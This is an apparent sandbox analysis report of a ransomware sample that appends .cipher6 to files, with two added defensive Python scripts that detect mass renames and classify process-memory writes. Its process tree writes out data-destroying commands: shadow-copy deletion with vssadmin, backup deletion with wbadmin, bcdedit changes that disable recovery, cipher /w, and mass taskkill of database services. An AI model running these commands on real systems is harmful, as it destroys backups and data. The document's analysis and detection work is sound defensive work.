Resubmissions (date submitted | analysis ID | score)
- 23-01-2023 15:59 | 230123-tfhcmaff5y | 10
- 30-11-2022 07:42 | 221130-jjqs3adc2x | 10
- 29-11-2022 11:01 | 221129-m4m5fsfd71 | 10
Analysis
- max time kernel: 123s
- max time network: 154s
- platform: windows10-2004_x64
- resource: win10v2004-20220812-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 29-11-2022 11:01
Static task: static1
Behavioral task: behavioral1 (sample 64new_cip6.exe, resource win7-20220812-en)
Behavioral task: behavioral2 (sample 64new_cip6.exe, resource win10v2004-20220812-en)
General
- Target: 64new_cip6.exe
- Size: 309KB
- MD5: 4ee1b43ffdea06ff320b1dbfc7195087
- SHA1: 3efec2894e16fa21417808c99bedfa7ddbd5c881
- SHA256: c1fbc69f6892aa18f81cfaf0fc889be96a9421324fbd87cde99cd06731d27615
- SHA512: 64c285f003d72c20a839b19584a1576fc8f4f11b3500c5969102781241760a1fdb5d341e4e3862227792752bf15a145ce99f94dde3ed8ad6147032f0b0ea04e8
- SSDEEP: 6144:vPLavV9JccWJzcwYuUxhCKrSjZ5pjedRYc4ihyYr+3l0W3WtCyaw7c:v+vV9CZMuUxhC6SjZfjeu++3Gaw7c
Malware Config
Extracted from \??\A:\!-Recovery_Instructions-!.html (ransom note text as captured by the sandbox, HTML fragments included):
<h2>Mikesupp77@outlook.com</h2>
https://tox.chat/download.html</p>
Signatures
Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
Processes: description "PID 4268 created 676"; pid 4268; process 64new_cip6.exe; target process Explorer.EXE
Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.
Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
Processes: 4812 bcdedit.exe; 4992 bcdedit.exe
Deletes System State backups (2 IoCs; the signature name is missing from the extracted page and is taken from the process tree, where wbadmin DELETE SYSTEMSTATEBACKUP runs twice)
Processes: 5088 wbadmin.exe; 1340 wbadmin.exe
Deletes system backups (1 IoC; signature name likewise taken from the process tree, where wbadmin delete backup runs once)
Processes: 3272 wbadmin.exe
Modifies Installed Components in the registry (2 TTPs, 1 IoC)
Processes (explorer.exe): Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Active Setup\Installed Components
Modifies extensions of user files (5 IoCs)
Ransomware generally changes the extension on encrypted files.
Processes (64new_cip6.exe):
- File renamed C:\Users\Admin\Pictures\ReceiveUpdate.crw => C:\Users\Admin\Pictures\ReceiveUpdate.crw.cipher6
- File opened for modification C:\Users\Admin\Pictures\SearchMount.tiff
- File renamed C:\Users\Admin\Pictures\SearchMount.tiff => C:\Users\Admin\Pictures\SearchMount.tiff.cipher6
- File renamed C:\Users\Admin\Pictures\StepResize.crw => C:\Users\Admin\Pictures\StepResize.crw.cipher6
- File renamed C:\Users\Admin\Pictures\UninstallPing.tif => C:\Users\Admin\Pictures\UninstallPing.tif.cipher6
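The rename pattern in this signature (the whole original name kept, one fixed suffix appended, many files in a short window) is what a file-system telemetry rule should key on, rather than the literal string .cipher6. The following is an added example, not part of the sandbox report: the four renames in the event list are the ones logged above, the two benign renames are constructed controls, and the window and thresholds are this example's own choices.

```python
"""Detect mass 'append one suffix to many user files' renames in file events.
Added example; not part of the sandbox report. RENAME_EVENTS is constructed:
the four .cipher6 renames are from the signature above, the last two are
benign controls."""
import ntpath
from collections import defaultdict

# Constructed rename events: (timestamp in seconds, old path, new path).
RENAME_EVENTS = [
    (10.0, r"C:\Users\Admin\Pictures\ReceiveUpdate.crw",
           r"C:\Users\Admin\Pictures\ReceiveUpdate.crw.cipher6"),
    (10.1, r"C:\Users\Admin\Pictures\SearchMount.tiff",
           r"C:\Users\Admin\Pictures\SearchMount.tiff.cipher6"),
    (10.2, r"C:\Users\Admin\Pictures\StepResize.crw",
           r"C:\Users\Admin\Pictures\StepResize.crw.cipher6"),
    (10.3, r"C:\Users\Admin\Pictures\UninstallPing.tif",
           r"C:\Users\Admin\Pictures\UninstallPing.tif.cipher6"),
    # benign controls (constructed): an ordinary rename and a single .bak copy
    (11.0, r"C:\Users\Admin\Documents\report.docx",
           r"C:\Users\Admin\Documents\report-final.docx"),
    (12.0, r"C:\Users\Admin\Documents\notes.txt",
           r"C:\Users\Admin\Documents\notes.txt.bak"),
]


def appended_suffix(old_path, new_path):
    """Return the suffix appended to the *whole* original name, else None.
    Only new == old + '.xxx' counts; 'report.docx' -> 'report-final.docx'
    is an ordinary rename, not an append."""
    tail = new_path[len(old_path):]
    if new_path.startswith(old_path) and tail.startswith("."):
        return tail.lower()
    return None


def detect_mass_rename(events, window_s=60.0, min_files=3, min_orig_exts=2):
    """Flag any appended suffix applied to >= min_files files whose original
    extensions span >= min_orig_exts types, all within window_s of the first
    occurrence. Returns {suffix: (count, sorted original extensions)}."""
    by_suffix = defaultdict(list)
    for ts, old_path, new_path in events:
        suffix = appended_suffix(old_path, new_path)
        if suffix:
            # ntpath so Windows paths split correctly on any host
            by_suffix[suffix].append((ts, ntpath.splitext(old_path)[1].lower()))
    findings = {}
    for suffix, items in by_suffix.items():
        items.sort()
        t0 = items[0][0]
        exts = [ext for ts, ext in items if ts - t0 <= window_s]
        if len(exts) >= min_files and len(set(exts)) >= min_orig_exts:
            findings[suffix] = (len(exts), sorted(set(exts)))
    return findings


def original_names(events, suffix):
    """Recovery inventory: map each renamed path back to its original name."""
    return {new: old for _, old, new in events
            if appended_suffix(old, new) == suffix}


if __name__ == "__main__":
    hits = detect_mass_rename(RENAME_EVENTS)
    print(hits)  # {'.cipher6': (4, ['.crw', '.tif', '.tiff'])}
    for enc, orig in original_names(RENAME_EVENTS, ".cipher6").items():
        print(enc, "<-", orig)
```

The single notes.txt.bak append stays below the file threshold and the report.docx rename is not an append at all, so neither fires; the .cipher6 group fires because it spans several original extensions, which distinguishes an encryptor from a tool that legitimately appends one suffix to one file type.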
Enumerates connected drives (3 TTPs, 24 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Processes (64new_cip6.exe): File opened (read-only) on every drive letter except C: and D:, in the order logged: \??\B:, E:, G:, M:, O:, I:, S:, W:, V:, Z:, A:, F:, L:, P:, T:, U:, X:, Y:, H:, J:, K:, N:, Q:, R:
Drops file in Windows directory (3 IoCs)
Processes (wbadmin.exe): File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.3.etl, C:\Windows\Logs\WindowsBackup\WBEngine.2.etl, C:\Windows\Logs\WindowsBackup\WBEngine.1.etl
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Program crash (2 IoCs)
Processes: WerFault.exe pid 2168 for target pid 676 Explorer.EXE; WerFault.exe pid 3376 for target pid 3844 explorer.exe
Checks SCSI registry key(s) (3 TTPs, 4 IoCs)
SCSI information is often read in order to detect sandboxing environments.
Processes (vds.exe):
- Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000
- Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName
- Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000
- Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName
Note that all four reads are attributed to vds.exe (the Virtual Disk Service, started through vdsldr.exe -Embedding in the process tree), not to 64new_cip6.exe, so this signature is a side effect of the storage and backup commands the sample runs rather than evidence that the sample itself fingerprints the sandbox.
Interacts with shadow copies (2 TTPs, 1 IoC)
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes: 1320 vssadmin.exe
Kills process with taskkill (16 IoCs)
Processes (taskkill.exe pids): 1560, 704, 1760, 1424, 624, 2116, 4432, 3280, 3772, 3724, 2660, 3932, 2120, 4488, 1432, 3216
Modifies registry class (2 IoCs)
Processes (explorer.exe):
- Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2295526160-1155304984-640977766-1000\{6D5AE515-087A-4862-BBC8-B66AE676AF6C}
- Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Processes: 64new_cip6.exe pid 4268, 64 occurrences
Suspicious use of AdjustPrivilegeToken (55 IoCs)
Processes:
- SeDebugPrivilege: taskkill.exe pids 624, 2116, 2120, 1560, 4488, 4432, 3280, 3724, 3772, 1760, 2660, 704, 1424, 1432, 3932, 3216 (16 entries)
- vssvc.exe pid 3104: SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege (3 entries)
- WMIC.exe pid 3572: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 (21 entries)
- wbengine.exe pid 1092: SeBackupPrivilege, SeRestorePrivilege, SeSecurityPrivilege (3 entries)
- explorer.exe pid 3844: SeShutdownPrivilege and SeCreatePagefilePrivilege, alternating (12 entries)
Suspicious use of FindShellTrayWindow (6 IoCs)
Processes: explorer.exe pid 3844, 6 occurrences
Suspicious use of SendNotifyMessage (8 IoCs)
Processes: explorer.exe pid 3844, 8 occurrences
Suspicious use of WriteProcessMemory (64 IoCs)
Processes (writer pid/image -> target pid/image, number of writes; the pattern matches the cmd.exe -> cmd.exe -> taskkill.exe chains in the process tree):
- 4268 64new_cip6.exe -> 5068 cmd.exe (3); 5068 cmd.exe -> 3236 cmd.exe (2)
- 4268 64new_cip6.exe -> 3924 cmd.exe (3); 3924 cmd.exe -> 4760 cmd.exe (2); 4760 cmd.exe -> 624 taskkill.exe (2)
- 4268 64new_cip6.exe -> 4736 cmd.exe (3); 4736 cmd.exe -> 3656 cmd.exe (2); 3656 cmd.exe -> 2116 taskkill.exe (2)
- 4268 64new_cip6.exe -> 1548 cmd.exe (3); 1548 cmd.exe -> 4148 cmd.exe (2); 4148 cmd.exe -> 2120 taskkill.exe (2)
- 4268 64new_cip6.exe -> 1792 cmd.exe (3); 1792 cmd.exe -> 1980 cmd.exe (2); 1980 cmd.exe -> 1560 taskkill.exe (2)
- 4268 64new_cip6.exe -> 1504 cmd.exe (3); 1504 cmd.exe -> 1936 cmd.exe (2); 1936 cmd.exe -> 4488 taskkill.exe (2)
- 4268 64new_cip6.exe -> 3784 cmd.exe (3); 3784 cmd.exe -> 3016 cmd.exe (2); 3016 cmd.exe -> 4432 taskkill.exe (2)
- 4268 64new_cip6.exe -> 380 cmd.exe (3); 380 cmd.exe -> 4756 cmd.exe (2); 4756 cmd.exe -> 3280 taskkill.exe (2)
- 4268 64new_cip6.exe -> 4524 cmd.exe (3); 4524 cmd.exe -> 1908 cmd.exe (2); 1908 cmd.exe -> 3724 taskkill.exe (2)
- 4268 64new_cip6.exe -> 4260 cmd.exe (3); the listing stops here at the 64-entry cap
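A WriteProcessMemory IoC count on its own does not separate process injection from the writes every parent makes into a child it has just created. The following is an added example, not part of the sandbox report: it parses the flattened "PID A wrote to memory of B A image target" dump in the form printed above and checks each edge against a creator map. WPM_EXCERPT is the first twelve entries of the dump verbatim; PARENT_OF is this example's reconstruction from the process tree, which lists no PIDs, so it is an assumption; the final 1111 -> 2222 entry is constructed to exercise the cross-process branch.

```python
"""Parse the flattened WriteProcessMemory IoC dump into weighted edges and
classify each edge as parent->child (creator writing into its new child) or
cross-process (candidate injection). Added example; not part of the report."""
import re
from collections import Counter

# First twelve entries of the dump above, verbatim, plus one constructed entry.
WPM_EXCERPT = (
    "PID 4268 wrote to memory of 5068 4268 64new_cip6.exe cmd.exe "
    "PID 4268 wrote to memory of 5068 4268 64new_cip6.exe cmd.exe "
    "PID 4268 wrote to memory of 5068 4268 64new_cip6.exe cmd.exe "
    "PID 5068 wrote to memory of 3236 5068 cmd.exe cmd.exe "
    "PID 5068 wrote to memory of 3236 5068 cmd.exe cmd.exe "
    "PID 4268 wrote to memory of 3924 4268 64new_cip6.exe cmd.exe "
    "PID 4268 wrote to memory of 3924 4268 64new_cip6.exe cmd.exe "
    "PID 4268 wrote to memory of 3924 4268 64new_cip6.exe cmd.exe "
    "PID 3924 wrote to memory of 4760 3924 cmd.exe cmd.exe "
    "PID 3924 wrote to memory of 4760 3924 cmd.exe cmd.exe "
    "PID 4760 wrote to memory of 624 4760 cmd.exe taskkill.exe "
    "PID 4760 wrote to memory of 624 4760 cmd.exe taskkill.exe "
    # constructed: a write into a process the writer did not create
    "PID 1111 wrote to memory of 2222 1111 sample.exe target.exe"
)

# Assumed creator relationships (child pid -> parent pid), reconstructed from
# the process tree; the tree itself carries no PIDs.
PARENT_OF = {5068: 4268, 3236: 5068, 3924: 4268, 4760: 3924, 624: 4760}

# "PID <src> wrote to memory of <dst> <src> <src image> <dst image>"
WPM_RX = re.compile(r"PID (\d+) wrote to memory of (\d+) \1 (\S+) (\S+)")


def parse_wpm(text):
    """Return Counter {(src_pid, src_image, dst_pid, dst_image): n_writes}."""
    edges = Counter()
    for m in WPM_RX.finditer(text):
        src, dst, src_img, dst_img = m.groups()
        edges[(int(src), src_img, int(dst), dst_img)] += 1
    return edges


def classify_edges(edges, parent_of):
    """Split edges by whether the target was created by the writer.
    A creator writing into its own new child is normal process start-up;
    anything else is a cross-process write worth a closer look."""
    result = {"parent_child": [], "cross_process": []}
    for edge, n in sorted(edges.items()):
        src_pid, _, dst_pid, _ = edge
        bucket = "parent_child" if parent_of.get(dst_pid) == src_pid else "cross_process"
        result[bucket].append((edge, n))
    return result


if __name__ == "__main__":
    buckets = classify_edges(parse_wpm(WPM_EXCERPT), PARENT_OF)
    for (src, simg, dst, dimg), n in buckets["parent_child"]:
        print(f"parent->child  {src} {simg} -> {dst} {dimg} x{n}")
    for (src, simg, dst, dimg), n in buckets["cross_process"]:
        print(f"CROSS-PROCESS  {src} {simg} -> {dst} {dimg} x{n}")
```

Under the assumed creator map every write in the report's excerpt lands in the writer's own child (three writes per child from the 32-bit sample, two from each cmd.exe), so the 64 IoCs describe process spawning, not code injection; only the constructed 1111 -> 2222 edge ends up in the cross-process bucket.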
System policy modification (1 TTP, 4 IoCs)
Processes (64new_cip6.exe, both instances):
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System (2 entries)
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" (2 entries)
EnableLinkedConnections = 1 makes drive mappings created under a user's standard token visible to processes running under that user's elevated (linked) token, so a process that has elevated can reach the network shares the user mapped; this is the setting a ransomware needs before encrypting mapped drives, and it fits the second instance of the sample being launched with -network.
Processes
One process per line as "image path | command line [signatures]"; indentation shows depth in the process tree.
C:\Windows\Explorer.EXE | C:\Windows\Explorer.EXE
  C:\Users\Admin\AppData\Local\Temp\64new_cip6.exe | "C:\Users\Admin\AppData\Local\Temp\64new_cip6.exe" [Suspicious use of NtCreateUserProcessOtherParentProcess; Modifies extensions of user files; Enumerates connected drives; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory; System policy modification]
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill "SQL" [Suspicious use of WriteProcessMemory]
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c rem Kill "SQL"
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe [Suspicious use of WriteProcessMemory]
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe [Suspicious use of WriteProcessMemory]
        C:\Windows\system32\taskkill.exe | taskkill -f -im sqlbrowser.exe [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlwriter.exe [Suspicious use of WriteProcessMemory]
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlwriter.exe [Suspicious use of WriteProcessMemory]
        C:\Windows\system32\taskkill.exe | taskkill -f -im sqlwriter.exe [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlservr.exe [Suspicious use of WriteProcessMemory]
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlservr.exe [Suspicious use of WriteProcessMemory]
        C:\Windows\system32\taskkill.exe | taskkill -f -im sqlservr.exe [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe [Suspicious use of WriteProcessMemory]
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe [Suspicious use of WriteProcessMemory]
        C:\Windows\system32\taskkill.exe | taskkill -f -im msmdsrv.exe [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe [Suspicious use of WriteProcessMemory]
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe [Suspicious use of WriteProcessMemory]
        C:\Windows\system32\taskkill.exe | taskkill -f -im MsDtsSrvr.exe [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe [Suspicious use of WriteProcessMemory]
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe [Suspicious use of WriteProcessMemory]
        C:\Windows\system32\taskkill.exe | taskkill -f -im sqlceip.exe [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe [Suspicious use of WriteProcessMemory]
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe [Suspicious use of WriteProcessMemory]
        C:\Windows\system32\taskkill.exe | taskkill -f -im fdlauncher.exe [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe [Suspicious use of WriteProcessMemory]
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe [Suspicious use of WriteProcessMemory]
        C:\Windows\system32\taskkill.exe | taskkill -f -im Ssms.exe [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
        C:\Windows\system32\taskkill.exe | taskkill -f -im SQLAGENT.EXE [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
        C:\Windows\system32\taskkill.exe | taskkill -f -im fdhost.exe [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
        C:\Windows\system32\taskkill.exe | taskkill -f -im fdlauncher.exe [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlservr.exe
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlservr.exe
        C:\Windows\system32\taskkill.exe | taskkill -f -im sqlservr.exe [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
        C:\Windows\system32\taskkill.exe | taskkill -f -im ReportingServicesService.exe [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
        C:\Windows\system32\taskkill.exe | taskkill -f -im msftesql.exe [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
        C:\Windows\system32\taskkill.exe | taskkill -f -im pg_ctl.exe [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im postgres.exe
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c taskkill -f -im postgres.exe
        C:\Windows\system32\taskkill.exe | taskkill -f -im postgres.exe [Kills process with taskkill; Suspicious use of AdjustPrivilegeToken]
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
        C:\Windows\system32\net.exe | net stop MSSQLServerADHelper100
          C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop MSSQLServerADHelper100
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS
        C:\Windows\system32\net.exe | net stop MSSQL$ISARS
          C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop MSSQL$ISARS
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW
        C:\Windows\system32\net.exe | net stop MSSQL$MSFW
          C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop MSSQL$MSFW
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS
        C:\Windows\system32\net.exe | net stop SQLAgent$ISARS
          C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop SQLAgent$ISARS
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW
        C:\Windows\system32\net.exe | net stop SQLAgent$MSFW
          C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop SQLAgent$MSFW
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c net stop SQLBrowser
        C:\Windows\system32\net.exe | net stop SQLBrowser
          C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop SQLBrowser
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop ReportServer$ISARS
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c net stop ReportServer$ISARS
        C:\Windows\system32\net.exe | net stop ReportServer$ISARS
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c net stop SQLWriter
        C:\Windows\system32\net.exe | net stop SQLWriter
          C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop SQLWriter
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
        C:\Windows\system32\vssadmin.exe | vssadmin.exe Delete Shadows /All /Quiet [Interacts with shadow copies]
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersions:0 -quiet
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersions:0 -quiet
        C:\Windows\system32\wbadmin.exe | wbadmin delete backup -keepVersions:0 -quiet [Deletes system backups; Drops file in Windows directory]
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
        C:\Windows\system32\wbadmin.exe | wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest [Deletes System State backups]
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
        C:\Windows\System32\Wbem\WMIC.exe | wmic.exe SHADOWCOPY /nointeractive [Suspicious use of AdjustPrivilegeToken]
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
        C:\Windows\system32\wbadmin.exe | wbadmin DELETE SYSTEMSTATEBACKUP [Deletes System State backups]
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoveryenabled No
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoveryenabled No
        C:\Windows\system32\bcdedit.exe | bcdedit.exe /set {default} recoveryenabled No [Modifies boot configuration data using bcdedit]
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
      C:\Windows\system32\cmd.exe | C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
        C:\Windows\system32\bcdedit.exe | bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures [Modifies boot configuration data using bcdedit]
    C:\Windows\SysWOW64\cipher.exe | cipher /w:\\?\C:
  C:\Users\Admin\AppData\Local\Temp\64new_cip6.exe | \\?\C:\Users\Admin\AppData\Local\Temp\64new_cip6.exe -network [System policy modification]
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c pause
  C:\Windows\system32\WerFault.exe | C:\Windows\system32\WerFault.exe -u -p 676 -s 7696 [Program crash]
C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop ReportServer$ISARS
